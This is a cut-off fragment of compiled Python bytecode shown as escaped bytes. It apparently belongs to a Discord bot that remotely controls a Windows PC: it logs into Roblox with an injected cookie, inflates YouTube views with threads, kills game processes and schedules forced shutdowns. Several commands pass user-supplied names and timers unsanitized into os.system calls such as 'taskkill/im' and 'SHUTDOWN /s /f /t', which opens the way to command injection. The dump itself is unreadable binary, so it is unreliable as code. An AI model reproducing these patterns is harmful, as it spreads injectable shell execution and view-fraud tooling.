\x00t\x01\xa0\x02d\x01\xa1\x01\x01\x00\t\x00t\x07\xa0\x08d\t\xa1\x01\x01\x00q*)\nNz\x1bhttps://web.roblox.com/homez\x0b.roblox.comi\x06\x96ueTrL\x00\x00\x00\xfa\x01/)\x07Z\x06domainZ\x06expiryZ\x08httpOnlyr\'\x00\x00\x00r3\x00\x00\x00Z\x06secure\xda\x05valuez\x0ccookie errori,\x01\x00\x00)\tr\x8c\x00\x00\x00r\x8a\x00\x00\x00r\x85\x00\x00\x00Z\x0fmaximize_windowZ\nadd_cookierV\x00\x00\x00r#\x00\x00\x00r^\x00\x00\x00r_\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x11robloxlogincookie\xdb\x00\x00\x00s\x16\x00\x00\x00\x06\x02\n\x01\x08\x01\x02\x01\x1e\x01\x06\x01\n\x01\n\x01\x02\x01\n\x01\x02\xffr\x8f\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00s<\x00\x00\x00\x87\x00f\x01d\x01d\x02\x84\x08}\x02t\x00t\x01|\x00\x83\x01\x83\x01D\x00]\x0f}\x03t\x02j\x03|\x02d\x03\x8d\x01\xa0\x04\xa1\x00\x01\x00t\x05\xa0\x06d\x04\xa1\x01\x01\x00q\x0cd\x00S\x00)\x05Nc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x13\x00\x00\x00s0\x00\x00\x00t\x00\x83\x00a\x01t\x01\xa0\x02\x88\x00\xa1\x01\x01\x00t\x03\xa0\x04d\x01\xa1\x01\x01\x00\t\x00t\x01\xa0\x05\xa1\x00\x01\x00t\x03\xa0\x04d\x03\xa1\x01\x01\x00q\x0e)\x04N\xe9\t\x00\x00\x00T\xe9\x08\x00\x00\x00)\x06r\x8c\x00\x00\x00r\x8a\x00\x00\x00r\x85\x00\x00\x00r^\x00\x00\x00r_\x00\x00\x00Z\x07refreshr\x19\x00\x00\x00rM\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x0byoutubeviwe\xe8\x00\x00\x00s\x0e\x00\x00\x00\x06\x02\n\x01\n\x01\x02\x01\x08\x01\n\x01\x02\xfez\x1bgfgggg.<locals>.youtubeviwe\xa9\x01\xda\x06targetrd\x00\x00\x00)\x07r"\x00\x00\x00\xda\x03int\xda\tthreading\xda\x06Thread\xda\x05startr^\x00\x00\x00r_\x00\x00\x00)\x04\xda\x04manyrN\x00\x00\x00r\x92\x00\x00\x00Z\x03iiir\x19\x00\x00\x00rM\x00\x00\x00r\x0e\x00\x00\x00\xda\x06gfgggg\xe7\x00\x00\x00s\n\x00\x00\x00\x0c\x01\x10\x08\x10\x01\x0c\x01\x04\xfer\x9a\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\t\x00\x00\x00C\x00\x00\x00s\x96\x00\x00\x00d\x01\xa0\x00d\x02d\x03d\x04d\x05\xa1\x04d\x06\x17\x00}\x00t\x01j\x02d\x07d\x08\x8d\x01D\x00]8}\x01t\x03j\x04d\tk\x02r"d\n|\x01j\x05v\x00s!|\x01j\x06d\x0bk\x02r"q\x10t\x01\xa0\x07|\x01j\x08\xa1\x01}\x02|\x00d\x01\xa0\x00|\x01j\tt\n|\x02j\x0bd\x0c\x1a\x00\x83\x01d\r\x17\x00t\n|\x02j\x0cd\x0c\x1a\x00\x83\x01d\r\x17\x00t\n|\x02j\r\x83\x01d\x0e\x17\x00\xa1\x04d\x06\x17\x007\x00}\x00q\x10|\x00S\x00)\x0fNz\x18{:<9} {:<9} {:<9} {:<9} Z\x05DriveZ\x04FreeZ\x05Totalz\x04Use%\xda\x01\nF)\x01\xda\x03all\xda\x02ntZ\x05cdromr\x0e\x00\x00\x00i\x00\x00\x00@Z\x02GB\xfa\x01%)\x0er]\x00\x00\x00\xda\x06psutilZ\x0fdisk_partitionsr2\x00\x00\x00r\'\x00\x00\x00\xda\x04optsZ\x06fstypeZ\ndisk_usageZ\nmountpointZ\x06devicerw\x00\x00\x00Z\x04free\xda\x05total\xda\x07percent)\x03Z\x04disk\xda\x04partZ\x05usager\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\tdisk_data\xf3\x00\x00\x00s\x0e\x00\x00\x00\x14\x01\x10\x01\n\x01\x16\x01\x0c\x01B\x01\x04\x01r\xa4\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sR\x00\x00\x00d\x01}\x00t\x00r\'t\x01t\x02\x83\x01\x01\x00t\x03d\x02|\x00\x9b\x00\x9d\x02\x83\x01\x01\x00t\x04d\x03\x83\x01\x01\x00t\x05\x83\x00\x01\x00t\x04d\x04\x83\x01\x01\x00t\x06\xa0\x07d\x05\xa1\x01\x01\x00|\x00d\x067\x00}\x00t\x00s\x04d\x00S\x00d\x00S\x00)\x07Nr\x01\x00\x00\x00z\x06login \xe9\x1e\x00\x00\x00i\xb0\x04\x00\x00\xfa#taskkill/im RobloxPlayerBeta.exe /Fr\x17\x00\x00\x00)\x08r[\x00\x00\x00rW\x00\x00\x00rV\x00\x00\x00r#\x00\x00\x00ra\x00\x00\x00rK\x00\x00\x00r2\x00\x00\x00rp\x00\x00\x00)\x01rx\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x05noone\xfb\x00\x00\x00s\x04\x00\x00\x00\x04\x02N\x01r\xa7\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\xf3,\x00\x00\x00e\x00Z\x01d\x00Z\x02\x87\x00f\x01d\x01d\x02\x84\x08Z\x03d\x03e\x04j\x05f\x02d\x04d\x05\x84\x04Z\x06\x87\x00\x04\x00Z\x07S\x00)\x06\xda\x06Bypassc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\xf3.\x00\x00\x00t\x00\x83\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x02j\x03j\x04d\x02d\x03d\x04\x8d\x02|\x00_\x05|\x00\xa0\x06|\x00j\x05\xa1\x01\x01\x00d\x00S\x00\xa9\x05Nz\nUrl BypassZ\x03UrlT\xa9\x02r\x13\x00\x00\x00Z\x08required\xa9\x07\xda\x05super\xda\x08__init__r\x1f\x00\x00\x00\xda\x02ui\xda\tTextInputrN\x00\x00\x00\xda\x08add_item\xa9\x01\xda\x04self\xa9\x01\xda\t__class__r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xaf\x00\x00\x00\x00\x01\x00\x00\xf3\x0c\x00\x00\x00\x0c\x01\x06\x01\x02\x01\x02\x01\x08\xfe\x10\x04z\x0fBypass.__init__\xda\x0binteractionc\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00\xc3\x00\x00\x00\xf3\x88\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00t\x01j\x02d\x02d\x03|\x00j\x03j\x04i\x01d\x04d\x05i\x01d\x06\x8d\x03}\x02d\x07|\x02\xa0\x05\xa1\x00d\x08\x19\x00\x9b\x00d\t|\x02\xa0\x05\xa1\x00d\n\x19\x00\x9b\x00d\x0b|\x02\xa0\x05\xa1\x00d\x0c\x19\x00\x9b\x00d\r\x9d\x07}\x03t\x06j\x07d\x0e|\x03d\x0f\x8d\x02}\x04|\x01j\x08|\x04d\x10\x8d\x01I\x00d\x00H\x00\x01\x00t\t|\x04\x83\x01I\x00d\x00H\x00\x01\x00d\x00S\x00\xa9\x11Nr\x0f\x00\x00\x00z\x17https://api.bypass.vip/rN\x00\x00\x00z\nuser-agentz\x83Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36)\x02r|\x00\x00\x00rP\x00\x00\x00z\x15\n        Old Link  : Z\x05queryz\x15\n        Medthod   : Z\x07websitez\x15\n        Bypass To : Z\x0bdestinationz\t\n        z\x07By Pass\xa9\x02r\x12\x00\x00\x00Z\x0bdescriptionr\x1c\x00\x00\x00\xa9\n\xda\x08removeporQ\x00\x00\x00rR\x00\x00\x00rN\x00\x00\x00r\x8e\x00\x00\x00r|\x00\x00\x00r\x1f\x00\x00\x00\xda\x05Embedr!\x00\x00\x00r&\x00\x00\x00\xa9\x05r\xb4\x00\x00\x00r\xb8\x00\x00\x00Z\x03asdZ\x04doneZ\x02wwr\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x08callback\x07\x01\x00\x00\xf3\x1a\x00\x00\x00\x02\x80\x08\x02\x1c\x01\x02\x01\n\x01\x04\xff\n\x02\x04\xfe\n\x03\x08\xfd\x0e\x05\x12\x01\x12\x01z\x0fBypass.callback\xa9\x08\xda\x08__name__\xda\n__module__\xda\x0c__qualname__r\xaf\x00\x00\x00r\x1f\x00\x00\x00\xda\x0bInteractionr\xc0\x00\x00\x00\xda\r__classcell__r\x19\x00\x00\x00r\x19\x00\x00\x00r\xb5\x00\x00\x00r\x0e\x00\x00\x00r\xa9\x00\x00\x00\xff\x00\x00\x00\xf3\x06\x00\x00\x00\x08\x00\x0c\x01\x18\x07r\xa9\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00sH\x00\x00\x00e\x00Z\x01d\x00Z\x02\x87\x00f\x01d\x01d\x02\x84\x08Z\x03d\x03e\x04j\x05f\x02d\x04d\x05\x84\x04Z\x06\x87\x00f\x01d\x06d\x02\x84\x08Z\x03d\x03e\x04j\x05f\x02d\x07d\x05\x84\x04Z\x06\x87\x00\x04\x00Z\x07S\x00)\x08\xda\x08youtubevc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00sL\x00\x00\x00t\x00\x83\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x02j\x03j\x04d\x02d\x03d\x04\x8d\x02|\x00_\x05t\x02j\x03j\x04d\x05d\x03d\x04\x8d\x02|\x00_\x06|\x00\xa0\x07|\x00j\x05\xa1\x01\x01\x00|\x00\xa0\x07|\x00j\x06\xa1\x01\x01\x00d\x00S\x00)\x06Nz\x0cYoutube Viewz\x11Url Youtube VideoTr\xac\x00\x00\x00u\x15\x00\x00\x00\xe0\xb8\x88\xe0\xb8\xb3\xe0\xb8\x99\xe0\xb8\xa7\xe0\xb8\x99\xe0\xb8\x88\xe0\xb8\xad)\x08r\xae\x00\x00\x00r\xaf\x00\x00\x00r\x1f\x00\x00\x00r\xb0\x00\x00\x00r\xb1\x00\x00\x00rN\x00\x00\x00r\x99\x00\x00\x00r\xb2\x00\x00\x00r\xb3\x00\x00\x00r\xb5\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xaf\x00\x00\x00\x14\x01\x00\x00s\x16\x00\x00\x00\x0c\x01\x06\x01\x02\x01\x02\x01\x08\xfe\x06\x04\x02\x01\x02\x01\x08\xfe\x0c\x04\x10\x01z\x11youtubev.__init__r\xb8\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00s\\\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00z\x1a|\x01\xa0\x01d\x02\xa1\x01I\x00d\x00H\x00\x01\x00t\x02j\x03t\x04|\x00j\x05j\x06|\x00j\x07j\x06f\x02d\x03\x8d\x02\xa0\x08\xa1\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x01\xa0\x01d\x04\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x05Nr\x0f\x00\x00\x00\xf5\x12\x00\x00\x00\xe0\xb8\xaa\xe0\xb8\xb3\xe0\xb9\x80\xe0\xb8\xa3\xe0\xb9\x87\xe0\xb8\x88)\x02r\x94\x00\x00\x00\xda\x04args\xf5\x1b\x00\x00\x00\xe0\xb9\x84\xe0\xb8\xa1\xe0\xb9\x88\xe0\xb8\xaa\xe0\xb8\xb3\xe0\xb9\x80\xe0\xb8\xa3\xe0\xb9\x87\xe0\xb8\x88)\tr\xbd\x00\x00\x00r!\x00\x00\x00r\x96\x00\x00\x00r\x97\x00\x00\x00r\x9a\x00\x00\x00r\x99\x00\x00\x00r\x8e\x00\x00\x00rN\x00\x00\x00r\x98\x00\x00\x00\xa9\x02r\xb4\x00\x00\x00r\xb8\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xc0\x00\x00\x00 \x01\x00\x00s\x0c\x00\x00\x00\x02\x80\x08\x02\x02\x01\x10\x01$\x01\x1c\x01z\x11youtubev.callbackc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00r\xaa\x00\x00\x00r\xab\x00\x00\x00r\xad\x00\x00\x00r\xb3\x00\x00\x00r\xb5\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xaf\x00\x00\x00(\x01\x00\x00r\xb7\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00\xc3\x00\x00\x00r\xb9\x00\x00\x00r\xba\x00\x00\x00r\xbc\x00\x00\x00r\xbf\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xc0\x00\x00\x00/\x01\x00\x00r\xc1\x00\x00\x00r\xc2\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\xb5\x00\x00\x00r\x0e\x00\x00\x00r\xc9\x00\x00\x00\x13\x01\x00\x00s\n\x00\x00\x00\x08\x00\x0c\x01\x10\x0c\x0c\x08\x18\x07r\xc9\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00r\xa8\x00\x00\x00)\x06\xda\x05endpgc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00r\xaa\x00\x00\x00)\x05Nz\tTask Killz\x19exe name ex[valorant.exe]Tr\xac\x00\x00\x00)\x07r\xae\x00\x00\x00r\xaf\x00\x00\x00r\x1f\x00\x00\x00r\xb0\x00\x00\x00r\xb1\x00\x00\x00\xda\x03exer\xb2\x00\x00\x00r\xb3\x00\x00\x00r\xb5\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xaf\x00\x00\x00<\x01\x00\x00r\xb7\x00\x00\x00z\x0eendpg.__init__r\xb8\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00sL\x00\x00\x00\x81\x01z\x16t\x00\xa0\x01d\x01|\x00j\x02j\x03\x9b\x00d\x02\x9d\x03\xa1\x01\x01\x00|\x01\xa0\x04d\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x01\xa0\x04d\x04\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x05N\xfa\x0ctaskkill/im \xfa\x03 /Fr\xca\x00\x00\x00r\xcc\x00\x00\x00)\x05r2\x00\x00\x00rp\x00\x00\x00r\xcf\x00\x00\x00r\x8e\x00\x00\x00r!\x00\x00\x00r\xcd\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xc0\x00\x00\x00C\x01\x00\x00s\n\x00\x00\x00\x02\x80\x02\x01\x16\x01\x16\x01\x1c\x01z\x0eendpg.callbackr\xc2\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\xb5\x00\x00\x00r\x0e\x00\x00\x00r\xce\x00\x00\x00;\x01\x00\x00r\xc8\x00\x00\x00r\xce\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00r\xa8\x00\x00\x00)\x06\xda\tShutdown1c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00s.\x00\x00\x00t\x00\x83\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x02j\x03j\x04d\x01d\x02d\x03\x8d\x02|\x00_\x05|\x00\xa0\x06|\x00j\x05\xa1\x01\x01\x00d\x00S\x00)\x04Nz\x11Set Shutdown TimeTr\xac\x00\x00\x00)\x07r\xae\x00\x00\x00r\xaf\x00\x00\x00r\x1f\x00\x00\x00r\xb0\x00\x00\x00r\xb1\x00\x00\x00\xda\x02ttr\xb2\x00\x00\x00r\xb3\x00\x00\x00r\xb5\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xaf\x00\x00\x00I\x01\x00\x00r\xb7\x00\x00\x00z\x12Shutdown1.__init__r\xb8\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00sJ\x00\x00\x00\x81\x01z\x15t\x00\xa0\x01d\x01|\x00j\x02j\x03\x9b\x00\x9d\x02\xa1\x01\x01\x00|\x01\xa0\x04d\x02\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x01\xa0\x04d\x03\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x04Nz\x12SHUTDOWN /s /f /t r\xca\x00\x00\x00r\xcc\x00\x00\x00)\x05r2\x00\x00\x00rp\x00\x00\x00r\xd3\x00\x00\x00r\x8e\x00\x00\x00r!\x00\x00\x00r\xcd\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xc0\x00\x00\x00P\x01\x00\x00s\x06\x00\x00\x00\x02\x80,\x01\x1c\x01z\x12Shutdown1.callbackr\xc2\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\xb5\x00\x00\x00r\x0e\x00\x00\x00r\xd2\x00\x00\x00H\x01\x00\x00r\xc8\x00\x00\x00r\xd2\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00s$\x01\x00\x00e\x00Z\x01d\x00Z\x02\x87\x00f\x01d\x01d\x02\x84\x08Z\x03e\x04j\x05j\x06d\x03e\x04j\x07j\x08d\x04d\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x08d\t\x84\x04\x83\x01Z\x0be\x04j\x05j\x06d\ne\x04j\x07j\x08d\x0bd\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x0cd\r\x84\x04\x83\x01Z\x0ce\x04j\x05j\x06d\x0ee\x04j\x07j\x08d\x0fd\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x10d\x11\x84\x04\x83\x01Z\re\x04j\x05j\x06d\x12e\x04j\x07j\x08d\x13d\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x14d\x15\x84\x04\x83\x01Z\x0ee\x04j\x05j\x06d\x16e\x04j\x07j\x08d\x17d\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x18d\x19\x84\x04\x83\x01Z\x0fe\x04j\x05j\x06d\x1ae\x04j\x07j\x10d\x1bd\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x1cd\x1d\x84\x04\x83\x01Z\x11\x87\x00\x04\x00Z\x12S\x00)\x1e\xda\x04cappc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\xf3\x12\x00\x00\x00t\x00\x83\x00j\x01d\x00d\x01\x8d\x01\x01\x00d\x00S\x00\xa9\x02N)\x01Z\x07timeout\xa9\x02r\xae\x00\x00\x00r\xaf\x00\x00\x00r\xb3\x00\x00\x00r\xb5\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xaf\x00\x00\x00T\x01\x00\x00s\x02\x00\x00\x00\x12\x01z\rcapp.__init__\xda\x08Valorant\xda\x02c1\xa9\x03r\x13\x00\x00\x00r\x14\x00\x00\x00Z\tcustom_id\xda\x06buttonr\xb8\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00\xf3R\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00z\x15t\x01\xa0\x02d\x02\xa1\x01\x01\x00t\x01\xa0\x02d\x03\xa1\x01\x01\x00|\x02\xa0\x03d\x04\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x03d\x05\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x06Nr\x0f\x00\x00\x00z%taskkill/im RiotClientServices.exe /Fz\x1btaskkill/im VALORANT.exe /Fr\xca\x00\x00\x00r\xcc\x00\x00\x00\xa9\x04r\xbd\x00\x00\x00r2\x00\x00\x00rp\x00\x00\x00r!\x00\x00\x00\xa9\x03r\xb4\x00\x00\x00r\xdb\x00\x00\x00r\xb8\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xd9\x00\x00\x00V\x01\x00\x00\xf3\x10\x00\x00\x00\x02\x80\x08\x03\x02\x01\n\x01\n\x01\x16\x01\x06\x01\x16\x01z\x07capp.c1rI\x00\x00\x00\xda\x02c2c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00r\xdc\x00\x00\x00)\x06Nr\x0f\x00\x00\x00z\'taskkill/im RobloxPlayerLauncher.exe /Fr\xa6\x00\x00\x00r\xca\x00\x00\x00r\xcc\x00\x00\x00r\xdd\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xe0\x00\x00\x00`\x01\x00\x00r\xdf\x00\x00\x00z\x07capp.c2\xfa\x10Synapse Launcher\xda\x02c3c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\x83\x00\x00\x00s\x9a\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00z9t\x01\x9b\x00d\x02\x9d\x02\x89\x00\x87\x00f\x01d\x03d\x04\x84\x08t\x02\x88\x00\x83\x01D\x00\x83\x01}\x03|\x03D\x00]\x1b}\x04d\x05|\x04v\x00s"d\x06|\x04v\x00r&\x01\x00W\x00d\x00S\x00d\x07|\x04v\x00r3t\x03\xa0\x04d\x08|\x04\x9b\x00d\t\x9d\x03\xa1\x01\x01\x00q\x18|\x02\xa0\x05d\n\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x05d\x0b\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x0cNr\x0f\x00\x00\x00r1\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x13\x00\x00\x00s\x1e\x00\x00\x00g\x00|\x00]\x0b}\x01t\x00t\x01\x88\x00|\x01\x83\x02\x83\x01r\x02|\x01\x91\x02q\x02S\x00r\x19\x00\x00\x00r\x05\x00\x00\x00r4\x00\x00\x00r6\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r7\x00\x00\x00p\x01\x00\x00rH\x00\x00\x00z\x1bcapp.c3.<locals>.<listcomp>r8\x00\x00\x00r9\x00\x00\x00r\xcf\x00\x00\x00r\xd0\x00\x00\x00r\xd1\x00\x00\x00r\xca\x00\x00\x00r\xcc\x00\x00\x00)\x06r\xbd\x00\x00\x00r;\x00\x00\x00r\x04\x00\x00\x00r2\x00\x00\x00rp\x00\x00\x00r!\x00\x00\x00)\x05r\xb4\x00\x00\x00r\xdb\x00\x00\x00r\xb8\x00\x00\x00r?\x00\x00\x00r@\x00\x00\x00r\x19\x00\x00\x00r6\x00\x00\x00r\x0e\x00\x00\x00r\xe2\x00\x00\x00j\x01\x00\x00s\x1a\x00\x00\x00\x02\x80\x08\x03\x02\x01\n\x01\x16\x01\x08\x01\x18\x01\x08\x01\x12\x01\x02\x80\x16\x01\x06\x01\x16\x01z\x07capp.c3\xda\x0fMultiple_ROBLOX\xda\x02c4c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00\xf3H\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00z\x10t\x01\xa0\x02d\x02\xa1\x01\x01\x00|\x02\xa0\x03d\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x03d\x04\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x05Nr\x0f\x00\x00\x00z"taskkill/im Multiple_ROBLOX.exe /Fr\xca\x00\x00\x00r\xcc\x00\x00\x00r\xdd\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xe4\x00\x00\x00x\x01\x00\x00s\x0e\x00\x00\x00\x02\x80\x08\x03\x02\x01\n\x01\x16\x01\x06\x01\x16\x01z\x07capp.c4\xda\tTLauncher\xda\x02c5c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00r\xdc\x00\x00\x00)\x06Nr\x0f\x00\x00\x00z\x18taskkill/im javaw.exe /Fz\x1ctaskkill/im TLauncher.exe /Fr\xca\x00\x00\x00r\xcc\x00\x00\x00r\xdd\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xe7\x00\x00\x00\x81\x01\x00\x00r\xdf\x00\x00\x00z\x07capp.c5z\x07out app\xda\x02c6c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00\xf3:\x00\x00\x00\x81\x01z\r|\x02j\x00\xa0\x01t\x02\x83\x00\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x03d\x01\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00\xa9\x02Nr\xcc\x00\x00\x00)\x04r\x8b\x00\x00\x00\xda\nsend_modalr\xce\x00\x00\x00r!\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xe8\x00\x00\x00\x8b\x01\x00\x00\xf3\x06\x00\x00\x00\x02\x80\x1c\x02\x1c\x01z\x07capp.c6)\x13r\xc3\x00\x00\x00r\xc4\x00\x00\x00r\xc5\x00\x00\x00r\xaf\x00\x00\x00r\x1f\x00\x00\x00r\xb0\x00\x00\x00r\xdb\x00\x00\x00r,\x00\x00\x00r.\x00\x00\x00\xda\x06Buttonr\xc6\x00\x00\x00r\xd9\x00\x00\x00r\xe0\x00\x00\x00r\xe2\x00\x00\x00r\xe4\x00\x00\x00r\xe7\x00\x00\x00\xda\x04grayr\xe8\x00\x00\x00r\xc7\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\xb5\x00\x00\x00r\x0e\x00\x00\x00r\xd4\x00\x00\x00S\x01\x00\x00s\x1c\x00\x00\x00\x08\x00\x0c\x01\x14\x02\x18\x01\x14\t\x18\x01\x14\t\x18\x01\x14\r\x18\x01\x14\x08\x18\x01\x14\t \x01r\xd4\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00s$\x01\x00\x00e\x00Z\x01d\x00Z\x02\x87\x00f\x01d\x01d\x02\x84\x08Z\x03e\x04j\x05j\x06d\x03e\x04j\x07j\x08d\x03d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x07d\x08\x84\x04\x83\x01Z\x0be\x04j\x05j\x06d\te\x04j\x07j\x08d\td\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\nd\x0b\x84\x04\x83\x01Z\x0ce\x04j\x05j\x06d\x0ce\x04j\x07j\x08d\x0cd\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\rd\x0e\x84\x04\x83\x01Z\re\x04j\x05j\x06d\x0fe\x04j\x07j\x08d\x0fd\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x10d\x11\x84\x04\x83\x01Z\x0ee\x04j\x05j\x06d\x12e\x04j\x07j\x08d\x12d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\